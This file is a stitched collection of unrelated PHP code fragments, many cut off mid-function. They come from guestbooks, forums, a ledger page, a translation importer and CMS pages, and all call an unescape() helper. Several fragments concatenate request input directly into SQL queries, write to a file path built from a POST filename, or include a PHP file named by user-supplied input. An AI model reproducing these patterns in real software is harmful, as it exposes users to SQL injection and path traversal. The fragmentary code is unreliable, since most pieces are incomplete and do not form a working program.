function smarty_function_mtfarkurl($args, &$ctx)
{
$entry = $ctx->stash('entry');
$permalink = $ctx->tag('MTEntryPermalink');
$link = 'http://cgi.fark.com/cgi/fark/farkit.pl';
$link .= '?h=' . htmlentities($entry['entry_title']);
$link .= '&u=' . unescape($permalink);
return $link;
}
function conv_codage($txt, $d, $enc)
{
if ($d == 'utf8') {
$ret = $enc ? utf8_encode(utf8_encode($txt)) : utf8_decode_b($txt);
} elseif ($d == 'base64') {
$ret = $enc ? base64_encode($txt) : base64_decode($txt);
} elseif ($d == 'htmlentities') {
$ret = $enc ? htmlentities($txt, ENT_QUOTES, 'ISO-8859-15', false) : html_entity_decode($txt);
} elseif ($d == 'url') {
$ret = $enc ? urlencode($txt) : urldecode($txt);
} elseif ($d == 'unescape') {
$ret = $enc ? $ret : unescape($txt, "");
} elseif ($d == 'ascii') {
if ($enc) {
$ret = ascii_encode($txt);
} else {
$ret = mb_convert_encoding($txt, 'ASCII') . "\r";
}
} elseif ($d == 'binary') {
$ret = $enc ? ascii2bin($txt) : bin2ascii($txt);
} elseif ($d == 'bin/dec') {
$ret = $enc ? decbin($txt) : bindec($txt);
} elseif ($d == 'timestamp') {
$ret = $enc ? strtotime($txt) : date('d/m/Y H:i:s', $txt);
} elseif ($d == 'php') {
$ret = clean_code($txt);
}
return stripslashes($ret);
}
function getHttpVal($key, $defaultVal)
{
$val = $defaultVal;
if (array_key_exists($key, $_GET)) {
$val = $_GET[$key];
} else {
if (array_key_exists($key, $_POST)) {
$val = $_POST[$key];
}
}
$v = unescape(trim($val));
return $v;
}
function cmd($cmd)
{
global $options;
$options = explode(" ", $cmd);
$script = unescape(array_shift($options));
for ($ind = 0; $ind < count($options); $ind++) {
$options[$ind] = unescape($options[$ind]);
}
if (is_file("commands/" . $script . ".php")) {
require_once "commands/" . $script . ".php";
} else {
echo "未找到命令:" . $script;
}
}
public function update()
{
//输出gb2312码,ajax默认转的是utf-8
header("Content-type: text/html; charset=utf-8");
if (!isset($_POST['author']) or !isset($_POST['content'])) {
alert('非法操作!', 3);
}
//读取数据库和缓存
$pl = M('guestbook');
$config = F('basic', '', './Web/Conf/');
//相关判断
if (Session::is_set('posttime')) {
$temp = Session::get('posttime') + $config['postovertime'];
if (time() < $temp) {
echo "请不要连续发布!";
exit;
}
}
//准备工作
if ($config['bookoff'] == 0) {
$data['status'] = 0;
}
//先解密js的escape
$data['author'] = htmlspecialchars(unescape($_POST['author']));
$data['content'] = htmlspecialchars(trim(unescape($_POST['content'])));
$data['title'] = htmlspecialchars(trim(unescape($_POST['title'])));
$data['tel'] = htmlspecialchars(trim(unescape($_POST['tel'])));
$data['ip'] = remove_xss(htmlentities(get_client_ip()));
$data['addtime'] = date('Y-m-d H:i:s');
//处理数据
if ($pl->add($data)) {
Session::set('posttime', time());
if ($config['bookoff'] == 0) {
echo '发布成功,留言需要管理员审核!';
exit;
} else {
echo '发布成功!';
exit;
}
} else {
echo '发布失败!';
exit;
}
}
public function __construct($install = false)
{
// Connect to DB (mysqli)
// Compat: if DB_FILE instead of the DSN is defined then assume SQLITE and make a DSN out of it
if (!$install) {
if (!defined('DB_DSN') && defined('DB_FILE')) {
define('DB_DSN', 'sqlite:' . DIR_EXEC . DB_FILE);
}
$this->_db = new PDOe(DB_DSN, null, null, array(PDO::ERRMODE_EXCEPTION));
}
// Instance of Smarty templates system
$this->_smarty = new Smarty();
$this->_smarty->template_dir = DIR_TPL;
$this->_smarty->compile_dir = DIR_TPL_COMPILE;
$this->_smarty->debugging = false;
//$this->_smarty->caching = true;
// Force a new compile for every request (only for dev)
$this->_smarty->force_compile = false;
$this->_smarty->register_modifier('decode', array(&$this, 'decode'));
// Assign constants with Smarty
foreach ($this->_getConstants() as $k => $v) {
$this->smartyAssign($k, $v);
}
$this->_session =& $_SESSION[APP];
$this->_request = unescape($_REQUEST);
$this->_post = unescape($_POST);
$this->_get = unescape($_GET);
$this->_cookie = unescape($_COOKIE);
$this->_files = unescape($_FILES);
$this->_server =& $_SERVER;
$this->_env =& $_ENV;
// Create json class
$this->_json = new Services_JSON();
if ($install) {
$this->_lang = 'en';
}
$this->loadLanguage($this->getLang());
if (isset($this->_request['ajax'])) {
$this->_ajax = true;
}
if (isset($this->_request['tpl'])) {
$this->_tpl = $this->_request['tpl'];
}
}
public function update()
{
//输出utf-8码,ajax默认转的是utf-8
header("Content-type: text/html; charset=utf-8");
if (!isset($_POST['aid']) or !isset($_POST['author']) or !isset($_POST['content'])) {
$this->error('非法操作!');
}
//读取数据库和缓存
$pl = M('pl');
$config = F('basic', '', './Web/Conf/');
$data['ip'] = htmlentities(get_client_ip());
//先解密js的escape
$data['author'] = htmlspecialchars(unescape($_POST['author']));
//使用stripslashes 反转义,防止服务器开启自动转义
$data['content'] = htmlspecialchars(trim(stripslashes(unescape($_POST['content']))));
$data['ptime'] = date('Y-m-d H:i:s');
$data['aid'] = intval($_POST['aid']);
if (Session::is_set('pltime')) {
$temp = Session::get('pltime') + $config['postovertime'];
if (time() < $temp) {
echo "请不要连续发布!";
exit;
}
}
if ($config['pingoff'] == 0) {
$data['status'] = 0;
}
if ($pl->add($data)) {
Session::set('pltime', time());
if ($config['pingoff'] == 0) {
echo "发布成功,评论需要管理员审核!";
exit;
} else {
echo "发布成功!";
exit;
}
} else {
echo "发布失败!";
exit;
}
}
function getLine($synset, $w, $comment)
{
# TODO??: avoid colloqial as first entry, otherwise "gehen" has
# a meaning "gehen (umgangssprachlich)" which is confusing?
$str = "";
foreach ($synset as $s) {
# FIXME: some words don't have synonyms, these should be ignored
if ($s != $w || sizeof($synset) == 1) {
$s = avoidPipe($s);
if ($comment != '') {
$str .= "|" . unescape($s . $comment);
} else {
$str .= "|" . unescape($s);
}
}
}
if ($str == "-") {
return "";
}
return $str;
}
public static function get($item, $type = 'any')
{
switch ($type) {
case 'post':
if (isset($_POST[$item])) {
return unescape($_POST[$item]);
}
break;
case 'get':
if (isset($_GET[$item])) {
return unescape($_GET[$item]);
}
break;
case 'any':
if (isset($_POST[$item])) {
return unescape($_POST[$item]);
} elseif (isset($_GET[$item])) {
return unescape($_GET[$item]);
}
break;
}
return '';
}
$py = $y - 1;
}
if ($nm > 12) {
$nm = 1;
$ny = $y + 1;
}
$akt = mktime(0, 0, 0, $m, 1, $y);
# aktuelle timestamp
$aka = date('Y-m-d', $akt);
$ake = date('Y-m-d', mktime(0, 0, 0, $m, date('t', $akt), $y));
$jakt = mktime(0, 0, 0, 1, 1, $y);
# atkueller jahr timestamp
$jaka = date('Y-m-d', $jakt);
$jake = date('Y-m-d', mktime(0, 0, 0, 12, date('t', mktime(0, 0, 0, 12, 1, $y)), $y));
$kontodaten = db_result(db_query("SELECT t1 FROM prefix_allg WHERE k = 'kasse_kontodaten'"), 0);
$kontodaten = unescape($kontodaten);
$kontodaten = bbcode($kontodaten);
$tpl = new tpl('kasse.htm');
$tpl->set('kontodaten', $kontodaten);
$tpl->set('minus', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE betrag < 0"), 0));
$tpl->set('plus', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE betrag > 0"), 0));
$tpl->set('saldo', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse"), 0));
$tpl->set('Jminus', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE betrag < 0 AND datum >= '" . $jaka . "' AND datum <= '" . $jake . "'"), 0));
$tpl->set('Jplus', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE betrag > 0 AND datum >= '" . $jaka . "' AND datum <= '" . $jake . "'"), 0));
$tpl->set('Jsaldo', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE datum >= '" . $jaka . "' AND datum <= '" . $jake . "'"), 0));
$tpl->set('Mminus', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE betrag < 0 AND datum >= '" . $aka . "' AND datum <= '" . $ake . "'"), 0));
$tpl->set('Mplus', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE betrag > 0 AND datum >= '" . $aka . "' AND datum <= '" . $ake . "'"), 0));
$tpl->set('Msaldo', db_result(db_query("SELECT ROUND(SUM(betrag),2) FROM prefix_kasse WHERE datum >= '" . $aka . "' AND datum <= '" . $ake . "'"), 0));
$tpl->set('month', $lang[date('F', $akt)]);
$tpl->set('pm', $pm);
$tpl->set('nm', $nm);
/**
* Get config option from database
*
* @param integer $user_id Current user ID
* @param string $name Parameter name
* @param string $returned_value If a value does exist it will be returned through
* this parameter which is passed by reference
* @return boolean
*/
function get_config_option($user_id, $name, &$returned_value)
{
if (trim($name) === '') {
return false;
}
$query = sprintf('
SELECT `value`
FROM user_preferences
WHERE user %s
AND parameter = "%s";
', is_null($user_id) ? 'IS NULL' : '= \'' . escape_check($user_id) . '\'', $name);
$config_option = sql_value($query, null);
if (is_null($config_option)) {
return false;
}
$returned_value = unescape($config_option);
return true;
}
require_once 'bbs_public.php';
if (!defined('ROOT')) {
exit('can\'t access!');
}
//暂时允许用户未登录评论!
//验证用户登陆相关操作
//$admin = new action_admin();
if (isset($_POST['reply'])) {
if (!isset($_POST['verify']) || strtolower(trim($_POST['verify'])) != strtolower($_SESSION['verify'])) {
echo -1;
//输入-1表示验证码输入错误!
exit;
}
$data = array();
$_POST['content'] = unescape($_POST['content']);
$data['aid'] = isset($_POST['aid']) ? intval($_POST['aid']) : exit(0);
$data['tid'] = isset($_POST['tid']) ? intval($_POST['tid']) : 0;
$data['content'] = isset($_POST['content']) ? $_POST['content'] : exit(0);
$data['username'] = isset($_COOKIE['username']) ? $_COOKIE['username'] : '';
//$data['userid'] = $admin->userid;
$data['addtime'] = mktime();
$data['ip'] = $_SERVER['REMOTE_ADDR'];
$reply = db_bbs_reply::getInstance();
$r = $reply->inserData($data);
if ($r) {
$archive = db_bbs_archive::getInstance();
$archive->updateClickReply($data['aid'], 'replynum');
$_SESSION['verify'] = '';
echo 1;
//输入1表示成功发表评论
<?php
header('Content-type: text/plain');
// secure page
require 'login.php';
// $debug=true;
debug_msg("User is logged in as " . $username);
$filepath = "users/" . $username;
// File upload details
$filename = $_POST["filename"];
$pathname = "../run/" . $filepath . "/" . $filename . ".xml";
debug_msg("The file is being saved in " . $pathname);
$data = unescape($_POST["data"]);
// Open (create if needs be) the file and write the data
$file = fopen($pathname, "w");
if (file_exists($pathname)) {
fwrite($file, $data);
fclose($file);
debug_msg("File written");
// select database
open_db();
// Is there a file in the DB with this name & path?
$sql = "SELECT file_id FROM file WHERE file_name='{$filename}' AND file_path='{$filepath}';";
$date = date("Y-m-d");
$reply = "File {$filename} ";
if ($key = query_one_item($sql)) {
$sql = "UPDATE file SET file_date='" . $date . "' WHERE file_id = " . $key . ";";
$reply .= "updated.";
} else {
$sql = "INSERT INTO file (file_date, file_author, file_path, file_name) " . "VALUES ('" . $date . "','" . $username . "','" . $filepath . "','" . $filename . "')";
$reply .= "created.";
$contect .= "<td nowrap width='40' >序号</td>";
$contect .= "<td nowrap width='270'>企业名称</td>";
$contect .= "<td nowrap >联系人</td>";
$contect .= "<td nowrap >联系电话</td>";
$contect .= "<td nowrap >城市</td>";
$contect .= "<td nowrap style='cursor:hand' onclick=loadmemberbuy('resort','joindate',document.getElementById('nowpage').value,document.getElementById('pagecount').value)>加入日期<span id=joindate>{$joindate}</span></td>";
$contect .= "<td nowrap style='cursor:hand' onclick=loadmemberbuy('resort','lasthf',document.getElementById('nowpage').value,document.getElementById('pagecount').value)>最后回访日期<span id=lasthf>{$lasthf}</span></td>";
$contect .= "<td nowrap >最近回访摘要</td>";
$contect .= "<td nowrap>操作区</td>";
$contect .= "</tr>";
if (!empty($atcompany)) {
$atcompany = iconv('utf-8', 'gbk', unescape($atcompany));
$querywhere .= " and fd_webcus_name like '%{$atcompany}%'";
}
if (!empty($atcity)) {
$atcity = iconv('utf-8', 'gbk', unescape($atcity));
$querywhere .= " and (fd_provinces_name like '%{$atcity}%' or fd_city_name like '%{$atcity}%')";
}
$beginpage = ($page - 1) * $pagecount;
//会员资料
$query = "select fd_webcus_id,fd_webcus_allname,\n fd_city_name , fd_webcus_newtime as joindate ,fd_provinces_name ,\n fd_webcus_lasthfdate as lasthf,fd_webcus_lasthfcontect\n\tfrom tb_webcustomer \n\tleft join tb_city on fd_city_code = fd_webcus_city\n\tleft join tb_provinces on fd_provinces_code = fd_webcus_provinces\n\twhere fd_webcus_erpcusid <> 0 {$querywhere} order by {$sort} {$sorttype} limit {$beginpage},{$pagecount}\n\t";
$db->query($query);
if ($db->nf()) {
$v = 0;
while ($db->next_record()) {
$cusid = $db->f(fd_webcus_id);
if ($v == 0) {
$vv = "where fd_webcus_id = '{$cusid}'";
} else {
$vv .= " or fd_webcus_id = '{$cusid}'";
}
$decodedStr .= $charAt;
$pos++;
}
}
if ($iconv_to != "UTF-8") {
$decodedStr = iconv("UTF-8", $iconv_to, $decodedStr);
}
return $decodedStr;
}
require_once '../../config/config.inc.php';
require_once '../../config/db_connect.inc.php';
require_once '../../language_files/language.inc.php';
require_once '../../pages/CCirculation.inc.php';
header("Content-Type: text/xml; charset={$DEFAULT_CHARSET}");
$strFiter = strip_tags($_REQUEST['strFilter']);
$strFiter = ltrim(unescape($strFiter, $DEFAULT_CHARSET));
$objCirculation = new CCirculation();
$arrIndex = $objCirculation->filterUsers($strFiter);
?>
<table cellpadding="2" cellspacing="0" style="background-color:white;" width="100%">
<tbody id="AvailableUsers">
<?php
$nMax = sizeof($arrIndex);
for ($nIndex = 0; $nIndex < $nMax; $nIndex++) {
$arrCurIndex = $arrIndex[$nIndex];
$nUserId = $arrCurIndex['user_id'];
$arrUser = $objCirculation->getUserById($nUserId);
$sid = $nUserId;
?>
<tr onMouseOver="this.style.background = '#ddd;'" onMouseOut="this.style.background = '#fff;'" onClick="document.getElementById('receiver_<?php
echo $sid;
# Get the matching string name
$SQL = "SELECT s.string_id, s.value, tr.value as tr_last, tr.possibly_incorrect as tr_last_fuzzy, trv.value as ever_tr_value\r\n\t\t\t\t\t\t\tFROM strings as s\r\n\t\t\t\t\t\t\tleft join translations as tr on (s.string_id = tr.string_id\r\n\t \t\t\t\t\tand tr.language_id = {$language_id}\r\n\t \t\t\t\t\tand tr.is_active)\r\n\t \t\t\t\t\tleft join translations as trv on (s.string_id = trv.string_id\r\n\t \t\t\t\t\tand trv.language_id = {$language_id}\r\n\t \t\t\t\t\tand trv.value = '" . addslashes(unescape($tags[1])) . "')\r\n\t\t\t\t\t\t\tWHERE s.is_active = 1 AND s.non_translatable <> 1 AND s.file_id = " . $file_id . " AND s.name = '" . $tags[0] . "'";
$rs_string = mysql_query($SQL, $dbh);
$myrow_string = mysql_fetch_assoc($rs_string);
if ($myrow_string['string_id'] > 0 && $tags[1] != "" && $myrow_string['ever_tr_value'] == "" && $tags[1] != $myrow_string['value']) {
$insert_as_fuzzy = 0;
if ($myrow_string['tr_last'] != "" && $fuzzy == 1 && $myrow_string['tr_last_fuzzy'] == 0) {
# This incoming translation is replacing an existing value that is *not* marked as fuzzy
# And the $fuzzy == 1, so we may be replacing a known good value !!
$insert_as_fuzzy = 1;
} else {
## Nothing. Insert as non-fuzzy.
## If this is replacing a fuzzy value, then that's a good thing
}
echo " Found string never translated to this value: " . $myrow_string['string_id'] . " value: " . $myrow_string['value'] . "\n";
$SQL = "UPDATE translations set is_active = 0 where string_id = " . $myrow_string['string_id'] . " and language_id = '" . $language_id . "'";
mysql_query($SQL, $dbh);
$SQL = "INSERT INTO translations (translation_id, string_id, language_id, version, value, possibly_incorrect, is_active, userid, created_on)\r\n\t\t\t\t\t\t\t\tVALUES (\r\n\t\t\t\t\t\t\t\t\tNULL, " . $myrow_string['string_id'] . ", \r\n\t\t\t\t\t\t\t\t\t" . $language_id . ", 0, '" . addslashes(unescape($tags[1])) . "', {$insert_as_fuzzy}, 1, " . $USER . ", NOW()\r\n\t\t\t\t\t\t\t\t)";
mysql_query($SQL, $dbh);
# echo $SQL;
}
}
}
}
}
} else {
echo " Cannot find a file for: " . $line . "\n";
}
}
}
echo "Done.\n\n";
$zu_list = '';
$zusortable = '';
foreach ($ggclz as $key => $value) {
if ($value) {
if ($value == $ggclzu) {
$zu_list .= '<option value="' . htmlspecialchars($value) . '" title="' . htmlspecialchars($value) . '" selected="selected">' . htmlspecialchars(cutstr($value, 10)) . '</option>';
} else {
$zu_list .= '<option value="' . htmlspecialchars($value) . '" title="' . htmlspecialchars($value) . '">' . htmlspecialchars(cutstr($value, 10)) . '</option>';
}
$zusortable .= '<li class="val ui-state-default"><span class="ui-icon ui-icon-arrowthick-2-n-s" title="可上下移动"></span><span class="ui-icon ui-icon-close" title="删除此组"></span>' . htmlspecialchars($value) . '</li>';
}
}
$sub_pages = $page < 1000 ? 10 : ($page < 10000 ? 7 : 5);
$subpageurl = 'listggcl.php?desc=' . $_REQUEST['desc'] . '&limit=' . $limit . '&ggcllei=' . urlencode($ggcllei) . '&ggclzu=' . urlencode($ggclzu) . '&search=' . urlencode(unescape($search)) . '&page=';
$fenye = new fenye($size, $limit, $page, $sub_pages, $subpageurl, 1);
$nav = $fenye->jieguo . ' <label>搜索<input class="search ui-widget-content" name="search" type="text" title="输入搜索内容,按回车或失去焦点" value="' . htmlspecialchars(unescape($search)) . '" /></label> <label>分类<select class="ggcllei ui-widget-content" name="ggcllei"><option value="-1">所有广告策略</option>' . $lei_list . '</select></label> <label>分组<select class="ggclzu ui-widget-content" name="ggclzu"><option value="-1">所有广告策略</option>' . $zu_list . '</select></label> <label title="列表升序排列,小到大"><input type="radio" name="desc" value="1"' . ($desc ? '' : ' checked="checked"') . ' />升序</label><label title="列表降序排列,大到小"><input type="radio" name="desc" value="0"' . ($desc ? ' checked="checked"' : '') . ' />降序</label>';
$title = '广告策略管理';
require 'mo.head.php';
?>
<style type="text/css">
input.limit{
width: 1.5em;
}
input.page{
width: 1em;
}
input.search{
width: 4em;
}
th.uith{
border-width:1px 1px 0px 0px;
$class_concent .= $tagstr . '</span>';
}
$news['content'] .= $class_concent;
$news['content1'] .= $class_concent;
$news['content2'] .= $class_concent;
$news['content3'] .= $class_concent;
$news['content4'] .= $class_concent;
$news['content'] = contentshow('<div>' . $news['content'] . '</div>');
$news['content1'] = contentshow('<div>' . $news['content1'] . '</div>');
$news['content2'] = contentshow('<div>' . $news['content2'] . '</div>');
$news['content3'] = contentshow('<div>' . $news['content3'] . '</div>');
$news['content4'] = contentshow('<div>' . $news['content4'] . '</div>');
$news['url'] = request_uri();
if ($metinfonow == $met_member_force and $met_webhtm) {
$html_filenamex = str_replace("\\", '', $html_filename);
$html_filenamex = unescape($html_filenamex);
$news['url'] = $met_weburl . $class_list[$class1]['foldername'] . '/' . $html_filenamex . $met_htmtype;
}
if ($pagemark == 3 || $pagemark == 5) {
if ($news['displayimg'] != '') {
$displayimg = explode('|', $news['displayimg']);
$pg = count($displayimg);
for ($i = 0; $i < $pg; $i++) {
$newdisplay = explode('*', $displayimg[$i]);
$displaylist[$i]['title'] = $newdisplay[0];
$displaylist[$i]['imgurl'] = $newdisplay[1];
$imgurl_diss = explode('/', $displaylist[$i]['imgurl']);
$displaylist[$i][imgurl_dis] = $imgurl_diss[0] . '/' . $imgurl_diss[1] . '/' . $imgurl_diss[2] . '/thumb_dis/' . $imgurl_diss[count($imgurl_diss) - 1];
$filename = stristr(PHP_OS, "WIN") ? @iconv("utf-8", "gbk", $displaylist[$i][imgurl_dis]) : $displaylist[$i][imgurl_dis];
$displaylist[$i][imgurl_dis] = file_exists($filename) ? $displaylist[$i][imgurl_dis] : $displaylist[$i]['imgurl'];
}
foreach (unescape($list_fields) as $list_field) {
$fields[] = $list_field['name'];
}
?>
wyf.listView.setFields(<?php
echo json_encode($fields);
?>
);
wyf.listView.init();
})
</script>
<script type="text/html" id="wyf_list_view_template">
<table id="wyf_list_table">
<thead>
<tr><?php
foreach (unescape($list_fields) as $field) {
echo "<th>{$field['label']}</th>";
}
?>
<th></th></tr>
</thead>
<tbody>
{{#list}}
<tr><?php
// Columns
foreach ($list_fields as $field) {
echo sprintf("<td>{{%s}}</td>", str_replace(".", "_", $field['name']));
}
?>
<td class="wyf_list_table_operations"><?php
//Operations
echo $lang["managemycollections"];
?>
</h1>
<p class="tight"><?php
echo text("introtext");
?>
</p><br>
<div class="BasicsBox">
<form method="post" action="<?php
echo $baseurl_short;
?>
pages/collection_manage.php">
<div class="Question">
<div class="tickset">
<div class="Inline"><input type=text name="find" id="find" value="<?php
echo htmlspecialchars(unescape($find));
?>
" maxlength="100" class="shrtwidth" /></div>
<div class="Inline"><input name="Submit" type="submit" value=" <?php
echo $lang["searchbutton"];
?>
" /></div>
<div class="Inline"><input name="Clear" type="button" onclick="document.getElementById('find').value='';submit();" value=" <?php
echo $lang["clearbutton"];
?>
" /></div>
</div>
<div class="clearerleft"> </div>
</div>
</form>
</div>
$commentHiddenStyle = "";
}
if ($permissions['viewip']) {
$viewIP = " - IP: " . $accountData['ip'];
}
$bbParser->parse($mData['comment']);
echo "<div class='commentContainer'>\n\t\t<div class='commentDate{$commentHiddenStyle}'>\n\t\t\t<table>\n\t\t\t\t<tr>\n\t\t\t\t\t<td width='887'>\n\t\t\t\t\t\t" . customDate($mData['date']) . " {$viewIP}\n\t\t\t\t\t</td>\n\n\t\t\t\t\t<td>\n\t\t\t\t\t\t<a href='thread?id=" . $mData['thread'] . "#COMMENT-" . $mData['id'] . "'>\n\t\t\t\t\t\t\tView Thread\n\t\t\t\t\t\t</a>\n\t\t\t\t\t</td>\n\t\t\t\t</tr>\n\t\t\t</table>\n\t\t</div>\n\n\t\t<div class='commentMain' style='box-shadow: 0px 5px 20px " . getPostShadow($mData['poster']) . ";'>\n\t\t\t<table>\n\t\t\t\t<tr>\n\t\t\t\t\t<td width='200'>\n\t\t\t\t\t\t<a href='user?id=" . $mData['poster'] . "' data-tooltip='View Profile: {$commentPoster}'>\n\t\t\t\t\t\t\t<div class='commentUser'>\n\t\t\t\t\t\t\t\t<div class='bold'>\n\t\t\t\t\t\t\t\t\t" . userNameTags($mData['poster'], $commentPoster) . "\n\t\t\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\t\t<br>\n\n\t\t\t\t\t\t\t\t" . $accountData['usertitle'] . "\n\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t</a>\n\n\t\t\t\t\t\t<br> <br>\n\n\t\t\t\t\t\t<img src='" . $accountData['avatar'] . "' data-noenlarge='true' " . getAvatarStyle($mData['poster']) . ">\n\n\t\t\t\t\t\t<br> <br> <br>\n\n\t\t\t\t\t\t<span class='bold'>Posts:</span> " . getPostCount($mData['poster']) . " <br>\n\t\t\t\t\t\t<span class='bold'>Country:</span> " . $accountData['country'] . "\n\t\t\t\t\t</td>\n\n\t\t\t\t\t<td width='20'></td>\n\n\t\t\t\t\t<td width='900'>\n\t\t\t\t\t\t<div class='commentText'>\n\t\t\t\t\t\t\t" . nl2br(unescape($bbParser->getAsHtml())) . "";
storePermissions($mData['poster']);
if ($temporaryPermissions['allowsignature'] && $accountData['signature'] && strlen($accountData['signature']) <= $temporaryPermissions['maxsignature'] && substr_count($accountData['signature'], "\n") <= $temporaryPermissions['maxsignaturelines']) {
echo "<br><br> ____________________________________________________________________ <br><br>";
if ($temporaryPermissions['signaturebbcode']) {
$bbParser->parse($accountData['signature']);
if ($temporaryPermissions['signatureimage']) {
echo nl2br(unescape($bbParser->getAsHtml()));
} else {
echo str_replace("<img", "[IMG", nl2br(unescape($bbParser->getAsHtml())));
}
}
}
echo "<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br> <div align='left'>";
if ($permissions['downloadattachments']) {
$attachmentsQuery = $mysql->query("SELECT `id`, `path` FROM `attachments` WHERE `thread` = '0' AND `post` = '" . escape($mData['id']) . "'");
while ($attachmentsData = $attachmentsQuery->fetch_assoc()) {
echo "<a href='downloadattachment?id=" . $attachmentsData['id'] . "' target='_blank'>\n\t\t\t\t\t\t\t\t\t\t<div data-tooltip='Attachment: " . round(filesize($attachmentsData['path']) / 1024, 1) . " KB' class='attachmentsBox'>\n\t\t\t\t\t\t\t\t\t\t\t" . basename($attachmentsData['path']) . "";
if ($permissions['deleteattachment']) {
echo " <a href='deleteattachment?id=" . $attachmentsData['id'] . "'>[Delete]</a>";
}
echo "</div>\t\n\t\t\t\t\t\t\t\t\t</a>";
}
echo "<br><br><br>";
}
// bilder abfragen
$limit = $img_per_site;
$page = $menu->getA(3) == 'p' ? $menu->getE(3) : 1;
$MPL = db_make_sites($page, '', $limit, 'index.php?user-usergallery-' . $uid, "usergallery` WHERE uid = " . $uid);
$anfang = ($page - 1) * $limit;
$erg = db_query("SELECT `name`, `besch`, `endung`, `id` FROM `prefix_usergallery` WHERE `uid` = " . $uid . " ORDER BY `id` DESC LIMIT " . $anfang . "," . $limit);
$tpl->set('imgperline', $allgAr['gallery_imgs_per_line']);
$tpl->set('MPL', $MPL);
$tpl->out(0);
$class = 'Cnorm';
$i = 0;
if (db_num_rows($erg) > 0) {
while ($row = db_fetch_assoc($erg)) {
$class = $class == 'Cmite' ? 'Cnorm' : 'Cmite';
$row['class'] = $class;
$row['besch'] = unescape($row['besch']);
if (loggedin() and (is_siteadmin() or $uid == $_SESSION['authid'])) {
$row['besch'] = '<a href=\'index.php?user-usergallery-' . $uid . '-p' . $page . '-d' . $row['id'] . '\'><img src=\'include/images/icons/del.gif\' border=\'0\' alt=\'löschen\' title=\'löschen\' /></a> ' . $row['besch'];
}
$row['width'] = round(100 / $img_per_line);
if ($i != 0 and $i % $img_per_line == 0) {
echo '</tr><tr>';
}
$tpl->set_ar_out($row, 1);
$i++;
}
if ($i % $img_per_line != 0) {
$anzahl = $img_per_line - $i % $img_per_line;
for ($x = 1; $x <= $anzahl; $x++) {
echo '<td class="' . $class . '"></td>';
}
function footer()
{
global $output, $db, $met_htmtype, $html_filename, $metinfonow, $met_member_force, $met_webhtm, $htmpack, $lang_htmcreate, $lang_htmsuccess, $index_url, $indexy, $met_chtmtype, $adminfile;
$output = str_replace(array('<!--<!---->', '<!---->', '<!--fck-->', '<!--fck', 'fck-->', '', "\r", substr($admin_url, 0, -1)), '', ob_get_contents());
$output = trim($output, "\n");
$db->close();
ob_end_clean();
if ($metinfonow == $met_member_force and $met_webhtm) {
$html_filename = str_replace("\\", '', $html_filename);
$html_filename = unescape($html_filename);
$html_filename .= $indexy == 'index' ? $met_htmtype : ($indexy == 1 ? $met_chtmtype : $met_htmtype);
if ($htmpack) {
$html_filename = htmpacks($html_filename, $adminfile);
}
$newhtm = explode('/', $html_filename);
$newhtm = $newhtm[count($newhtm) - 1];
if (stristr(PHP_OS, "WIN")) {
$html_filename = @iconv("utf-8", "GBK", $html_filename);
}
$handle = fopen($html_filename, "w");
if (!is_writable($html_filename)) {
$jsok = 2;
} elseif (!fwrite($handle, $output)) {
$jsok = 1;
} else {
$jsok = 0;
}
fclose($handle);
echo $jsok;
} else {
echo $output;
}
exit;
}
<?php
require "../include/common.inc.php";
require "../include/json.php";
header('Content-Type:text/html;charset=utf-8');
$db = new db_test();
$prov = u2g(unescape($prov));
$query = "select fd_china_city as city from tb_china where fd_china_prov = '{$prov}'\n group by fd_china_city order by fd_china_areacode asc";
$db->query($query);
if ($db->nf()) {
while ($db->next_record()) {
$arr_city_code = g2u($db->f(city));
$arr_city_name = g2u($db->f(city));
$select[] = array("id" => $arr_city_code, "title" => $arr_city_name);
}
}
if (empty($select)) {
$select[] = array("id" => "", "title" => "");
}
echo json_encode($select);
redirect("");
} else {
echo "The signature you have entered has too many lines. It may only have " . $permissions['maxsignaturelines'] . " lines. <br> <br>";
}
} else {
echo "The signature you have entered is too long. It must be below " . $permissions['maxsignature'] . " characters. <br> <br>";
}
} else {
echo "You may not have animated images in your signature. <br> <br>";
}
} else {
echo "You may not have images in your signature. <br> <br>";
}
}
$bbParser->parse($user['signature']);
echo "<form action='' method='POST'>\n\t\t\t\t\t\t\t\t<div class='box'>\n\t\t\t\t\t\t\t\t\t<div class='boxHeading'>\n\t\t\t\t\t\t\t\t\t\tModify Signature\n\t\t\t\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\t\t\t<div class='boxMain'>\n\t\t\t\t\t\t\t\t\t\t<div class='boxArea'>\n\t\t\t\t\t\t\t\t\t\t\t" . nl2br(unescape($bbParser->getAsHtml())) . "\n\t\t\t\t\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\t\t\t\t<div class='boxArea'>";
if ($permissions['signaturebbcode']) {
echo "<button type='button' data-tag='B' class='bbcode boxButton'>bold</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='I' class='bbcode boxButton'>italic</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='U' class='bbcode boxButton'>underline</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='LEFT' class='bbcode boxButton'>left</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='CENTER' class='bbcode boxButton'>center</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='RIGHT' class='bbcode boxButton'>right</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='LIST' class='bbcode boxButton'>bullet list</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='NLIST' class='bbcode boxButton'>number list</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='LI' class='bbcode boxButton'>list item</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button type='button' data-tag='EMAIL' class='bbcode 